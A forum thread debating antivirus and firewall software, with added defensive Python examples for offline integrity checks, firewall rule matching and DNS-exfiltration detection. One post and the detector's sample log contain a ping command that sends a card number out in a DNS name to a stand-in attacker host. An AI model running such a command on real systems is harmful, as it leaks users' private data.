Norton vs Zone Alarm firewalls

Is security software becoming a security risk?

"People think that putting one AV engine after another is somehow defense in depth. They think that if one engine doesn't catch the worm, the other will catch it," he said. "You haven't decreased your attack surface; you've increased it because every AV engine has bugs."

Although attackers have exploited parsing bugs in browsers for years now with some success, Zoller believes that because antivirus software runs everywhere and often with greater administrative rights than the browser, these flaws could lead to even greater problems in the future.

The bottom line, he says, is that antivirus software is broken. "One e-mail and boom, you're gone," he said.

Zoller says he has been criticized by his peers in the security industry for "questioning the very glue that holds IT security all together," but he believes that by bringing this issue to the forefront, the industry will be forced to address a very real security problem.

Reply to
Kayman

Kayman added these comments in the current discussion du jour ...

I don't think anyone thinks that having more than one true AV utility running at a time is a good idea. But what I listed running all the time, eTrust Pest Patrol, commercial Zone Alarm, and NAV 2006, are all intended to do different things in different ways. And running Ad-Aware and Spy Bot Search & Destroy as separate utilities periodically serves yet another security-related purpose. So, I see no conflicts here.

Now, as to one malware scanner finding things another misses, I don't think this is uncommon or unexpected behavior as the creation of definitions to detect new threats is not done in tandem with other developers and different specific utilities perform in entirely different ways.

Interesting. What there's a "death" of, IMO, is people who're aware enough to pay attention to safe computing and have at least a modicum of defenses against the bad guys. The popular malware utilities will catch the vast majority of common threats but if one's PC is attacked by a sophisticated enough hacker or whatever, it is doubtful that any software will catch it.

Reply to
HEMI-Powered

The problem is only that you are running the security software on the infected machine. If you have got malware which runs with Administrator privileges, you cannot rely on anything in your system anymore. It may have installed a good root kit which goes undetected. It may patch the signatures of your security software to go undetected. It can effectively disable your firewall even though the firewall and Windows still think it is running.

Thus, if you have an infected machine, you simply cannot tell how bad it is. Once you have a trojan on your computer which allows remote access to your computer, you are well beyond the standard malware which you'll find in the wild and which security software may detect. And as some people are more than happy to clean the computer "as good as possible" (or until none of the security software finds more), you can never tell what goes undetected on a computer if you check it on the same system. You should never trust a security check which is running on the infected system. If you want to scan, you should use a clean boot disk and scan the file system from there, or run a full comparison of the compromised file system with a clean backup to see what has been modified. That would give you more trustworthy results, although even then I would rather recommend restoring a clean system image.

There is a lot out there which no malware scanner finds or will ever find. They find what you can find very often. Malware which only appears a few hundred or thousand times, for instance for a little bot net, is unlikely ever to be found. And even if eventually the code is sent to a security company for analysis and is added to their signatures, you can just as well recompile the malware with some code obfuscation and it goes undetected again.

Exactly, that's why you cannot trust an infected system with whatever security scanner you may scan it. I will never understand why some people still use the same computer with the same system after 20 different scanners found a dozen different trojans, worms, viruses, etc. They use various removal tools and continue to use the computer after the next scan does not report anything anymore...

But that is what people do when they think a malware infection is simply inevitable eventually if you connect your computer to the internet.

Gerald

Reply to
Gerald Vogt
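The offline check Gerald describes (compare the compromised file system against a clean backup from a clean boot) can be done with a hash manifest. The following is an added example, not code from the thread or from any product mentioned in it. It assumes the suspect volume is mounted read-only from clean boot media and that the clean manifest was produced earlier from a trusted backup; to run offline it constructs both a clean tree and a tampered copy in a temporary directory, and the tampering it shows (a patched AV engine, a new driver, a deleted log) is invented for the example.

```python
"""Compare a suspect file tree against a manifest taken from a clean copy.

Added example, not part of the original thread. It assumes the suspect
volume is mounted read-only from a clean boot medium and that the clean
manifest was built earlier from a trusted backup; here both trees are
constructed in a temporary directory so the script runs offline.
"""
import hashlib
import os
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Hash a file in chunks so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Map each regular file's POSIX-style relative path to its SHA-256."""
    manifest = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            p = Path(dirpath) / name
            if p.is_file() and not p.is_symlink():
                manifest[p.relative_to(root).as_posix()] = sha256_file(p)
    return manifest


def compare(clean: dict, suspect: dict) -> dict:
    """Classify every path as modified, added or missing relative to clean."""
    return {
        "modified": sorted(p for p in clean if p in suspect and clean[p] != suspect[p]),
        "added": sorted(p for p in suspect if p not in clean),
        "missing": sorted(p for p in clean if p not in suspect),
    }


def _write(root: Path, rel: str, data: bytes) -> None:
    target = root / rel
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_bytes(data)


def demo() -> dict:
    """Build a clean tree and a tampered copy (both constructed) and diff them."""
    with tempfile.TemporaryDirectory() as tmp:
        clean_root = Path(tmp) / "clean"
        suspect_root = Path(tmp) / "suspect"
        for root in (clean_root, suspect_root):
            _write(root, "Windows/System32/ntdll.dll", b"original ntdll")
            _write(root, "Windows/System32/kernel32.dll", b"original kernel32")
            _write(root, "Program Files/AV/engine.dll", b"original scan engine")
            _write(root, "Windows/System32/LogFiles/security.log", b"logon events")
        # Constructed tampering on the suspect copy: a patched AV engine (so the
        # scanner stays blind), a new kernel driver, and a deleted log.
        _write(suspect_root, "Program Files/AV/engine.dll", b"patched scan engine")
        _write(suspect_root, "Windows/System32/drivers/rk.sys", b"rootkit driver")
        (suspect_root / "Windows/System32/LogFiles/security.log").unlink()
        return compare(build_manifest(clean_root), build_manifest(suspect_root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

The point of running this from clean media is the one Gerald makes: a manifest computed on the live, infected system is only as trustworthy as the kernel that served the file reads, and a rootkit can hide or substitute files from a live OS. "Modified" hits in system or security-product directories are the ones to look at first; an "added" driver under System32\drivers is a classic place for one.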

I keep hearing this 'fact' about outgoing messages having to be checked by a firewall, but, though I see the logic behind it, I'm not entirely convinced. After all, if a virus is smart enough to penetrate the incoming firewall, don't you think it will be smart enough to penetrate the outgoing firewall? Say by pretending it is a legitimate windows process (like MSFT Update) and then tricking the user into approving of it? I think so.

Two software firewalls may be a no-no, but I have three antivirus and spyware programs (AVG AntiSpyware, Kaspersky Antivirus, and Webroot) and they all happily play nicely together, with the most obnoxious of the three programs being Kaspersky (the "heuristics" is a pain), followed by Webroot (has given false positives in the past, though the company is good at correcting these mistakes) and AVG (works so nice, with no problems, that I sometimes wonder if it's doing anything at all, since I've seen ads saying that of all the vendors AVG products miss the most viruses, but when scanning your system AVG finds tracking cookies that the other two programs miss). Also Blacklight's free online Windows Explorer ActiveX product has found tracking cookies that all three of the above programs have missed.

RL

Reply to
raylopez99

Conflict(s) is/are not the issue; the OS may appear to be working smoothly. But installing anti-whatever applications has made your OS more vulnerable to attacks.

It is important that administrators follow the rule of least privilege. This means that users should operate their computer with only the minimum set of privileges that they need to do their job.

The best defenses are:

  1. Do not work as administrator, use a limited user account (LUA) for day-to-day work.
  2. Keep your system (and all software on it) patched.
  3. Review usage of IE and OE; Look for good alternatives.
  4. Don't expose services to public networks.
  5. Routinely practice safe-hex.
  6. Backup, backup, backup.

The least preferred defenses are: Most popular anti-whatever applications.

Reply to
Kayman

I used to have Norton anti-virus and firewall and it caused nothing but problems and is a resource hog. I eventually removed it, and glad I did. I now use AVG for my anti-virus along with A-Squared and Spybot for malware removal, and Comodo for my firewall, all of which are free and I haven't had a problem since.

Robert

Reply to
Robert

I forgot to mention that if you decide to remove Norton, remember to uninstall Live Update, and you also need to go to Norton's site (Symantec) for their removal utility. Your computer should run a lot faster without it.

Robert

Reply to
Robert

Not true. Conflicts between two on-access scanners are a very real issue and are indeed the main argument against installing concurrent scanners. Also, installing applications does not necessarily make an OS more vulnerable. The OS only becomes more vulnerable if some application has an exploitable bug. Of course installing additional software does increase the chance of that happening, but it doesn't automagically make the OS (more) vulnerable.

For example: you can easily run two or more on-demand virus scanners without a single problem, because they're running as simple userspace applications (and thus won't affect each other), and only run with the privileges of the user initiating the scan.

However, that doesn't mean that it'd be okay to install arbitrary AV software, because several of them have issues aside from what I mentioned above.

cu

59cobalt
Reply to
Ansgar -59cobalt- Wiechers

It doesn't need to be a virus. I did encounter that one time when accessing a web page unexpectedly triggered OE and the firewall blocked it. A firewall may have the ability to block -any- application from sending email without explicit approval. Monitoring outbound traffic also entails differentiating the legitimate processes from suspicious ones or spoofs. All firewalls are not equal, but if the firewall is doing the job well it's not enough for a process to pretend to be "iexplore.exe" in order to pass the firewall, it has to be c:\program files\internet explorer\iexplore.exe, with additional identifying information, be it a specific version number, CRC, etc.

Viruses aren't smart, they're all constrained to operating within specific program parameters. Some are more cleverly written than others but the vast majority have already been beaten.

Anyway this thread seems to be missing the point. It's analogous to saying that we shouldn't bother using crosswalks or crossing at the lights because it is always possible that some idiot driver might ignore the signals and run us down anyway. One side (anti-security) says avoid the problem by never crossing a street, the other side (pro-security) says use due caution and cross with the lights. I use a firewall mainly to keep unauthorised -people- out of my PC, AV and AS software to keep out or kill malicious software.

Reply to
RalfG
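The difference RalfG draws, between a rule that only looks at the executable's name and one that insists on the full path plus identifying information such as a CRC, can be shown in a few lines. This is an added example and not the behaviour of any particular firewall product; the rule, the "genuine" image bytes and the three process observations are constructed, and SHA-256 stands in for whatever checksum a real product uses.

```python
"""Outbound-rule matching: executable basename only versus full path plus
image hash. Added example, not from the thread. The rule, the "genuine"
image bytes and the three process observations are all constructed; a
real host firewall would obtain the path and hash the on-disk image itself.
"""
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    basename: str   # what a weak rule keys on
    path: str       # full path of the approved binary
    sha256: str     # hash of the approved image


@dataclass(frozen=True)
class Proc:
    path: str       # where the running executable lives on disk
    image: bytes    # its on-disk bytes (constructed here)


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def allowed_by_name(rule: Rule, proc: Proc) -> bool:
    """Weak check: any file called iexplore.exe anywhere passes."""
    return basename(proc.path) == rule.basename.lower()


def allowed_by_path_and_hash(rule: Rule, proc: Proc) -> bool:
    """Stricter check: the exact path and the exact image the rule was made for."""
    return (proc.path.lower() == rule.path.lower()
            and sha256_bytes(proc.image) == rule.sha256)


GENUINE_IMAGE = b"genuine iexplore.exe image (constructed)"
RULE = Rule("iexplore.exe",
            r"C:\Program Files\Internet Explorer\iexplore.exe",
            sha256_bytes(GENUINE_IMAGE))

# Constructed observations: the real browser, a copy of malware that merely
# borrowed the name, and the real path with a modified image on disk.
OBSERVATIONS = {
    "genuine": Proc(r"C:\Program Files\Internet Explorer\iexplore.exe", GENUINE_IMAGE),
    "renamed_malware": Proc(r"C:\Users\Public\iexplore.exe", b"malware (constructed)"),
    "patched_in_place": Proc(r"C:\Program Files\Internet Explorer\iexplore.exe",
                             GENUINE_IMAGE + b" patched"),
}


def evaluate(rule: Rule = RULE, observations: dict = OBSERVATIONS) -> dict:
    """Run both checks over every observation and report the verdicts."""
    return {
        name: {"by_name": allowed_by_name(rule, proc),
               "by_path_and_hash": allowed_by_path_and_hash(rule, proc)}
        for name, proc in observations.items()
    }


if __name__ == "__main__":
    for name, verdict in evaluate().items():
        print(name, verdict)
```

The name-only check passes all three; the path-plus-hash check passes only the genuine image at its genuine path. Note what even the stricter check does not establish: that the approved process is acting on the user's behalf rather than being driven by something else on the machine, and that the hash was computed from a trustworthy view of the disk in the first place.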


Actually I think it's more akin to birth than death. The major problems are most always for the newbies who haven't yet been educated, have been mis-educated, or simply kept in the background by people purposely talking over their heads when they do try to learn.

Pop`

Reply to
Poprivet`

...

An entirely possible set of events, yes. But there are other avenues onto a system than always in-bound and alone through the 'net ports. One example is being invited in: there's a program or 5 out there that will let you use smilies wherever you want to use them; Word, IE, Wordpad, most any application. Yahoo carries it as a link. Lots of newbies think Yahoo is pretty danged neat and go ahead and download it. I forget what it's called and it is pretty neat at first, but then the machine starts to slow down and you keep noticing lots of downloads coming into your machine. If the firewall sees it, they allow it because it's a familiar name and has to do with the app they just downloaded, claiming to be its updates. Only the "updates" never stop. It's the GAIN spyware though it goes by several different names. It's a PIA to remove and even their remove instructions, of course, don't fully work. I found it on the client's machine quickly with a malware scan.

Another possibility is a disk from a friend or acquaintance. It may or may not get scanned by a newbie. If it's only spyware it covertly contains, AV won't catch a problem. Not all spyware detectors will find it right away, so if all you use is, say, Windows Defender, there's a good chance you're not going to catch it, if you did bother to scan it. So, it starts calling home and guess what? You have spyware being downloaded into your machine, small pieces at a time until ... .

There's another side of this discussion too I'd like to mention. It seems a lot of the posts have begun to concentrate on the really miserable malware out there that's actually seldom seen by the normal user. Rather than discuss the generally relevant information in addition to the tough ones, they are concentrating on the tough ones as though they are all that exist. It appears to me to be more an attempt to display inflated egos than to impart any useful information to the masses and is dangerously close to being trolling in more than one of the posters; the others are just being sucked into endless discussions, the signature responses trolls hope for.

That's a reasonable arsenal you have, IMO, with the exception of possibly Webroot, which I've only read about but don't have any actual experience with. Heuristics, for what it's worth, IS good, but by its nature very prone to false positives; better a false positive than a false negative. The user should be fairly savvy and understand what is causing the hits with heuristics or it can create a sense of worry that's totally unnecessary. Heuristics is simply watching for virus-like activity, unable to know whether it's legitimate accesses due to a user's programs or viral activity, so it notifies the user each time. Cookies, IMO, I don't worry too much about. I only keep a few of them on my machine that I need for certain web site passwords, fast signons etc. and delete everything else. I use WinPatrol for that but for a lot of other things unrelated, too.

Regards,

Pop`

Reply to
Poprivet`

Which means again you went to that web page to start with. It was your action which brought you there.

Still, any application can send email without explicit approval if it really wants to. That's the point which is usually not mentioned.

An what keeps the malware from using the original IE to send out its data?

Yes. But that's all. A slightly cleverer malware sends out your credit card number through DNS. Your firewall does not help. It does not recognize it. You still need more effective means to protect your data which no security suite can provide.

No. That is the wrong analogy. No one ever said you can never cross the street.

You say you have to install security firewall, i.e. you have to cross the street with the security installed, i.e. at the lights. You must not cross the street at any other place (i.e. without security) because you will be killed, i.e. it is impossible to cross the street at any other place except at the lights.

Others say, this is not true. You don't need the security software. You can cross the street wherever you want. The traffic lights won't prevent you from being killed if all you do is to cross the street at the lights and never looking to the right or left. If you just start to walk when it's green you'll be eventually killed. There are a lot of nice drivers who stop at their red light but eventually you'll meet the one who does not.

The alternative is not to rely on the lights. Don't trust the lights. The effective security is to switch on your brain and protect yourself looking to the left and right and making sure yourself it is safe to cross the street at this time and at this place. This effectively protects you far better than relying on some software which tries to make the decision for you when it is safe to cross and when not.

And once you have learned how to cross the streets safely at any place you'll figure that you don't really need the lights as they only slow down your computer. Then you'll see that there is no MUST to use a security software as there are other far more efficient means to protect you. Then you'll see that all those people you think they MUST cross at the lights tend to turn off their brains because everybody else does the same and they'll never think about what they could do to protect themselves as it is "too complicated" or because everybody says "it is not possible otherwise".

That's the correct analogy if you want to use the "lights". No one ever said you cannot cross the street. On the contrary. (I already know how you will now adjust your analogy but...)

Anything that comes on to your computer first of all got there because of your action, i.e. your "invitation". But none of the security suites really deals with this fact nor

Gerald

Reply to
Gerald Vogt

Yes of course! Utilizing more than one (1) real-time anti-virus scanning engine most likely will cause conflicts; I didn't mean to suggest otherwise. I was trying to emphasise that additional software such as on-demand av/a-s and other anti-whatever apps. are not causing noticeable conflicts per se. Sorry for the confusion.

Reply to
Kayman

You may want to explain how exactly that is supposed to relate to what I wrote.

cu

59cobalt
Reply to
Ansgar -59cobalt- Wiechers

Normal usage of the computer for browsing, yes. Staying off of the internet is almost certainly the best way to avoid trouble but that's just a tad self defeating.

In your preferred setup nothing prevents emails from being sent. With an appropriate firewall the firewall can block emails from being sent without user intervention.

In your setup nothing; with many firewalls nothing as well. However, there are firewalls which do monitor all processes that try to start other processes.

You're basing your argument on a hypothetical malware and deficient AV and firewall apps. Sorry, that strawman logic doesn't work. One of the reasons for monitoring outbound traffic is precisely to stop unrecognized processes from making connections, either to the internet or to other nodes on a LAN. Firewall X might do this better than Firewall Y, Firewall Z might not do it at all. Y may not be as good a firewall as X but it is still better than Z, and even Z is better than nothing at all.

I never suggested certainty. The whole computer security issue is about probabilities. There is a greater probability of being hit by traffic if you don't use the crosswalks just as there is a greater probability of falling victim to malware if you don't use security software.

Drivers do so love aggressive jaywalkers... so many bonus points.

You just described using due caution.

There's no need to adjust my analogy. You haven't yet made a compelling argument in favour of your position, and I doubt that accident statistics will support your contentions either. :)

Blaming the victim?

Reply to
RalfG

The user's mail client is allowed to send mail. %OTHER_PROGRAM% utilizes the user's mail client to send mail. How does the firewall prevent that?

No, trying to intercept IPC and then let the user decide is not an option, because that kind of decision is *way* over a normal user's head.

There's exactly no need at all to do that. Software Restriction Policies already allow you to define which programs may or may not be executed.

Instead of restricting the communication of unrecognized processes you want to prevent unrecognized processes from being started in the first place. That's what AV software and SRP do.

Wrong, because this neglects the existence of exploitable bugs and design flaws in the firewall software as well as the possibility of intelligent malware.

No. Computer security is about reliability. Which may very well be based on probabilities, but only if you have some hard numbers. Which numbers are the probabilities you're talking about based on?

Pointless, unless you are able to quantify that.

cu

59cobalt
Reply to
Ansgar -59cobalt- Wiechers

I'll never understand why many people also jump to "stay off the internet". No one said so. It is your conclusion that it is inevitable to come to such "bad" web pages. And that is simply not true. You can browse the internet and still avoid most of those pages.

Yes. The firewall may be able to block emails from being sent with OE without user intervention.

It cannot prevent some malware from putting some mails into the outbox which are sent out the next time the user sends something out.

And it cannot prevent some malware from sending out e-mail or other data bypassing the firewall. If you want to get something out, you'll get it out even with the firewall in place.

Many people have a browser running at all times. You don't need to start a process. You just have to make the other process do what you want. That's not so awfully difficult.

Again. IE, OE, and other installed applications on your computer are not unrecognized processes. ping for example is a standard application. You can simply enter

ping VISA12341234123412340108RalfGGG.badguy.example.com

And here goes your credit card... You'll never notice. At the same time you run another process which you let get caught by the firewall to make the user think it is all safe and he can continue...

I don't have to use unrecognized processes to send data.

And even "unrecognized processes" can trick the firewall.

Good at blocking software you have installed and use to communicate: yes.

Good at blocking malware effectively: no.

This is just plain wrong. I am far safer if I open my eyes and make sure that it is safe to cross the street than if I rely on traffic lights.

Thus, why would you tell everybody to use the lights and it is absolutely essential to use the lights when there is a far more effective and safer method?

Which is far more effective security.

You started that analogy. I did not adjust it. You described it wrong.

The goal was to cross the street.

You use security software as an aid just like traffic lights are an aid for that.

I say you don't need the lights. You don't need the security software.

It is useless to discuss your analogy if you want the analogy to be that not using security software equals not crossing the street. Because you mix the aim with the tool which is supposed to help.

Yes. If a person refuses to learn about security. If a person thinks they only have to install a software suite to protect their computer. If a person thinks with a security suite in place everything is done which one can possibly do to have security. If someone wants to dig in the dirt he'll get dirty. If you are concerned about the security of your computer and data you'll learn rules how to keep secure.

Gerald

Reply to
Gerald Vogt
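Gerald's ping example (a card number smuggled out in a DNS name, sent by a tool the firewall already trusts) is exactly the traffic an application-level outbound rule cannot judge, but it is visible in DNS query logs. Below is an added example of the kind of check that can see it; it is not from the thread or from any product discussed in it. The log format (one query per line: timestamp, client, query name) and the queries themselves are constructed for the example, the "parent domain" is taken naively as everything after the first label rather than from a public-suffix list, and the length, entropy, digit-ratio and burst thresholds are assumptions that would need tuning against real traffic.

```python
"""Flag DNS queries whose leftmost label looks like smuggled data, and
parent domains that receive a burst of such labels from one client.

Added example, not part of the original thread. SAMPLE_LOG and its
format are constructed; thresholds are assumptions, not vendor defaults.
"""
import math
import re
from collections import Counter, defaultdict

# Constructed log: "<timestamp> <client> <query name>" per line.
SAMPLE_LOG = """\
2007-03-01T10:00:01 192.168.1.20 www.example.com
2007-03-01T10:00:02 192.168.1.20 update.microsoft.com
2007-03-01T10:00:03 192.168.1.20 VISA12341234123412340108RalfGGG.badguy.example.com
2007-03-01T10:00:04 192.168.1.20 4a6f686e20446f65.badguy.example.com
2007-03-01T10:00:05 192.168.1.20 3133372d30312d313233.badguy.example.com
2007-03-01T10:00:06 192.168.1.21 mail.example.net
"""

LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)$")


def parse_log(text: str):
    """Yield dicts for well-formed lines; skip blanks and anything else."""
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            yield {"ts": m.group(1), "client": m.group(2),
                   "qname": m.group(3).rstrip(".").lower()}


def shannon_entropy(s: str) -> float:
    """Bits per character; ordinary words score low, encoded data scores high."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def label_is_suspicious(label: str, min_len: int = 20,
                        min_entropy: float = 3.0,
                        min_digit_ratio: float = 0.3) -> bool:
    """Per-query heuristic: a long label that is either high-entropy or digit-heavy."""
    if len(label) < min_len:
        return False
    digit_ratio = sum(ch.isdigit() for ch in label) / len(label)
    return shannon_entropy(label) >= min_entropy or digit_ratio >= min_digit_ratio


def analyze(log_text: str, burst_threshold: int = 3, burst_label_len: int = 8) -> dict:
    """Return per-query hits plus (client, parent) pairs with many distinct long labels.

    The burst rule is what catches short chunks that slip under the per-query
    thresholds: exfiltration needs many queries, each with a fresh label.
    """
    suspicious = []
    seen = defaultdict(set)   # (client, parent) -> distinct leftmost labels
    for rec in parse_log(log_text):
        labels = rec["qname"].split(".")
        if len(labels) < 2:
            continue
        leftmost, parent = labels[0], ".".join(labels[1:])   # naive parent split
        if label_is_suspicious(leftmost):
            suspicious.append(rec["qname"])
        if len(leftmost) >= burst_label_len:
            seen[(rec["client"], parent)].add(leftmost)
    bursts = sorted(f"{client} -> {parent}"
                    for (client, parent), labs in seen.items()
                    if len(labs) >= burst_threshold)
    return {"suspicious_queries": suspicious, "bursty_parents": bursts}


if __name__ == "__main__":
    for key, hits in analyze(SAMPLE_LOG).items():
        print(key, hits)
```

On the constructed log the card-number query and the 20-character hex chunk trip the per-query rule, the 16-character hex chunk alone does not, and the burst rule still ties all three to badguy.example.com from the same client. This is detection after the fact, on the resolver or network side, which is the point: it is not something a host firewall rule keyed on which program made the connection can provide, and any such rule can be gamed by picking a trusted program.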

Yes Gerald, I know I should be kind of ashamed to belong still to the species who use ZA to some extent, but:

you are right, I can confirm it is so.

Reply to
Otto Sykora

Cabling-Design.com Forums website is not affiliated with any of the manufacturers or service providers discussed here. All logos and trade names are the property of their respective owners.